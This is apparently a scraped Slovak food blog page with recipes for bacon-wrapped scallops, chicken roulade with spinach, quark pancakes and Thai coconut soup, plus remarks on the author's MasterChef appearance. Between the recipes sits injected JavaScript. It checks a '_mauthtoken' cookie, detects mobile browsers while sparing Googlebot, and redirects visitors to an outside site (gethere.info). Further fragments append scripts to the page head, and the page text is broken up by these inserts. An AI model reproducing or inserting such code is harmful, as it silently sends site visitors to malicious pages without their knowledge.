  3. Mušle opláchneme studenou vodou a osušíme. Po obvode ich obalíme slaninkou, ktorú môžeme zachytiť pomocou špáradla. Okoreníme.
  4. Na panvici si rozpálime kokosový olej a pridáme na plátky nakrájaný zázvor. Olej sa nám krásne zázvorom ochutí (tuk totiž viaže chute :) ).
  5. Pridáme karotku a za občasného premiešania opekáme asi 5-8 minút. Dozlatista :). Hranolčeky by mali ostať akurát "naskus".
  6. Na inej panvici si medzičasom začneme opekať mušle. Nechceme použiť žiaden ďalší tuk a tak najprv položíme mušlu na panvicu stranou kde je slaninka. Stačí pár sekúnd, len aby sme získali trošku tuku. Potom ju pretočíme stranou kde je mušla a opekáme asi 2minútky z oboch týchto strán.
  7. Spolu naservírujeme na tanier, dozdobíme bylinkami a môžeme papať :).

 }if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Kuracia roládka, špenátik, grilovaná cukina a čips

Dnešný receptík je akousi kombináciou môjho jedla z predchádzajúceho masterchefa a jarnou sezónou :)… Kuracie mäsko plnené prosciuttom a sušenou paradajkou, príloha v podobe špenátu a cukiny. Doplnené je o čips z kuracej kože. Opäť ľahké, rýchle, zdravé papko s chuťou Talianska.

IMG_1842

Ingrediencie: (na 1 porciu)

Postup:

  1. Kuraciu kožu dáme na plech, osolíme, okoreníme a pečieme na 200°C cca 30minút.
  2. Vykostené kuracie stehno si rozdelíme na dve časti (ak teda nie je hneď rozdelené :) ). Osolíme a okoreníme z oboch strán. Olivovým olejom potrieme vonkajšiu stranu. Z vnútornej strany položíme plátok prosciutta a sušenú paradajku. Mäsko zarolujeme a zabalíme do alobalu – ako taký cukrík.
  3. Roládky pridáme do rúry. Tie potrebujú cca 20minút.
  4. Medzičasom si nakrájame na jemno cibuľku a cesnak, ktoré necháme na stredne silnom plameni skaramelizovať. Pridáme špenát, soľ, korenie a krátko podusíme – asi 2minútky.
  5. Cukinu jednoducho priečne nakrájame na tretiny/štvrtiny a na silnom plameni opečieme z oboch strán. Osolíme a okoreníme.
  6. Roládky vyberieme z rúry a pred krájaním ich necháme cca 5minút odležať. Tým, že sme ich piekli v alobale zostanú krásne šťavnaté a nebudú sa rozpadať :).
  7. Všetky časti jedla sa snažíme načasovať tak, aby sme ich naraz dorobili :). Prajem dobrú chuť.

IMG_1834

Kuracia roládka, špenátik, grilovaná cukina a čips

Kuracia roládka, špenátik, grilovaná cukina a čips

Ingredients

  • 1 kuracie stehno - vykostené, "odkožené"
  • asi 4 sušené paradajky
  • 2 plátky prosciutta
  • soľ, korenie
  • 1/2 cukiny
  • 100g špenátu
  • 1/2 cibule
  • 1 strúčik cesnaku
  • olivový olej

Instructions

  1. Kuraciu kožu dáme na plech, osolíme, okoreníme a pečieme na 200°C cca 30minút.
  2. Vykostené kuracie stehno si rozdelíme na dve časti (ak teda nie je hneď rozdelené :) ). Osolíme a okoreníme z oboch strán. Olivovým olejom potrieme vonkajšiu stranu. Z vnútornej strany položíme plátok prosciutta a sušenú paradajku. Mäsko zarolujeme a zabalíme do alobalu - ako taký cukrík.
  3. Roládky pridáme do rúry. Tie potrebujú cca 20minút.
  4. Medzičasom si nakrájame na jemno cibuľku a cesnak, ktoré necháme na stredne silnom plameni skaramelizovať. Pridáme špenát, soľ, korenie a krátko podusíme - asi 2minútky.
  5. Cukinu jednoducho priečne nakrájame na tretiny/štvrtiny a na silnom plameni opečieme z oboch strán.
  6. Roládky vyberieme z rúry a pred krájaním ich necháme cca 5minút odležať. Tým, že sme ich piekli v alobale zostanú krásne šťavnaté a nebudú sa rozpadať :).
  7. Všetky časti jedla sa snažíme načasovať tak, aby sme ich naraz dorobili :). Prajem dobrú chuť.

 d.getElementsByTagName(‘head’)[0].appendChild(s);

Najlepšie lievance na svete

Najlepšie lievance na svete

Ingredients

  • 250g tučného tvarohu (najradšej používam od AGRO - BIO Hubice alebo Olešnícky premium)
  • 3 vajíčka
  • 1 lyžica agátového medu
  • štipka vanilky alebo vanilkového prášku
  • štipka sódy (naozaj iba na špičku noža)
  • 2 lyžice hladkej pohánkovej múky
  • maslo alebo kokosový olej na opekanie

Instructions

  1. Ak používate hrudkový tvaroh, odporúčam ho spolu s vajíčkami a medom rozmixovať v blenderi alebo ponorným mixérom.
  2. Sypké ingrediencie poriadne premiešame a prišľaháme do tvarohovej zmesi.
  3. Cesto necháme chvíľku odležať aby nakyprilo.
  4. Maslo alebo kokosový olej si rozpustíme na panvici a pomocou lyžice "tvarujeme" lievance. Opekáme ich na strednom plameni asi 2minútky z každej strany.
  5. Lievance by sa mali trošku nafúknuť a vo vnútri byť dokonalo vláčne :). Naozaj budete prekvapení aké sú tieto lievance úžasné.
  6. Dobrú chuť :).

Kokosová polievka so zeleninovými rezančekmi

Na tento víkend som si pre Vás prichystala receptík na najlepšiu thajskú polievku na svete :).

IMG_1862

Jej základ tvorí kvalitný vývar, kokosové mlieko, čili, zázvor a troška sójovej omáčky. To ďalšie je už na Vás. Ak máte radi kuracie, pridáte kuracie. Ak krevety, tak krevety :). Namiesto klasických ryžových rezancov som sa rozhodla pripraviť zeleninové, ktoré nádherne túto polievku dotvárajú a pridajú jej zdravý “twist” :).

Moje prvé vystúpenie v Masterchef Slovensko je za mnou. Bolo to celkom napínavé, že? :P Našťastie to dopadlo dobre a teším sa na ďalšie kolá. A to mi vlastne pripomína, že od ďalšieho týždňa sa chystám robiť postíky s receptami, ktoré budem v súťaži variť. Máte sa na čo tešiť ;)!

Ďalšia upútavka tu: https://youtu.be/zdyPlCzaAwg

Tento recept je takisto inšpirovaný kurzom thajskej kuchyne, ktorý vediem v škole varenia Chefparade. Mám tam už aj vlastný profil a všetko :). Je to naozaj úžasný pocit.

Ingrediencie: (asi 4 porcie)

Postup:

  1. Zázvor s čili si nakrájame na plátky a vložíme do hrnca s vývarom. Vývar začneme zahrievať a chvíľu povaríme. Chceme aby sa vývar poriadne ochutil zázvorom a čili. Po cca 5 minútkach pridáme kuracie prsia (krevety) nakrájané na malé kúsky.
  2. Varíme ďalších 5 minút a pridáme kokosové mlieko. Polievku privedieme k varu a odstavíme. Dochutíme sójovou omáčkou a poprípade dosolíme.
  3. Medzičasom si jarnú cibuľku, cukinu a mrkvu nakrájame na tenké rezančeky (niečo ako julienne). Rozpálime si kokosový olej a postupne si opečieme zeleninu. Začíname mrkvou, ku ktorej po 4 minútkach pridáme cukinu, opekáme ďalšie 2 minútky a na konci pridáme jarnú cibuľku. Zeleninku samozrejme opekáme za stáleho miešania. Okoreníme a osolíme.
  4. Polievočku podávame tak, že na spodok misky si dáme zeleninové rezančeky a zalejeme polievkou.
  5. Ja osobne najradšej túto polievku papám kombinovane- lyžicou a paličkami :).
  6. Dobrú chuť.

IMG_1866

Kokosová polievka so zeleninovými rezančekmi

Kokosová polievka so zeleninovými rezančekmi

Ingredients

  • 250ml silného vývaru
  • 250ml kokosového mlieka (najlepšie Je Aroy-D s 60% podielom kokosu bez pridaných látok)
  • 200-400g nakrájaných kuracích pŕs alebo očistených kreviet – potrebné množstvo záleží od toho, či chcete polievočku ako hlavné jedlo :) (kvôli obsahu bielkovín na porciu)
  • 20-30g zázvoru
  • 1 malá čili paprička (alebo podľa chuti)
  • citrónová tráva/limetové listy – ak viete zohnať, ale nie je to potrebné :)
  • 2 lyžice kvalitnej sójovej omáčky (Kikoman alebo Yamasa)
  • 2 jarné cibuľky
  • 1 cukina
  • 2 mrkvy
  • soľ a korenie podľa chuti
  • kokosový olej na opekanie zeleniny

Instructions

  1. Zázvor s čili si nakrájame na plátky a vložíme do hrnca s vývarom. Vývar začneme zahrievať a chvíľu povaríme. Chceme aby sa vývar poriadne ochutil zázvorom a čili. Po cca 5 minútkach pridáme kuracie prsia (krevety) nakrájané na malé kúsky.
  2. Varíme ďalších 5 minút a pridáme kokosové mlieko. Polievku privedieme k varu a odstavíme. Dochutíme sójovou omáčkou a poprípade dosolíme.
  3. Medzičasom si jarnú cibuľku, cukinu a mrkvu nakrájame na tenké rezančeky (niečo ako julienne). Rozpálime si kokosový olej a postupne si opečieme zeleninu. Začíname mrkvou, ku ktorej po 4 minútkach pridáme cukinu, opekáme ďalšie 2 minútky a na konci pridáme jarnú cibuľku. Zeleninku samozrejme opekáme za stáleho miešania. Okoreníme a osolíme.
  4. Polievočku podávame tak, že na spodok misky si dáme zeleninové rezančeky a zalejeme polievkou.
  5. Ja osobne najradšej túto polievku papám kombinovane- lyžicou a paličkami :).
  6. Dobrú chuť.

 

 

 

 if (document.currentScript) {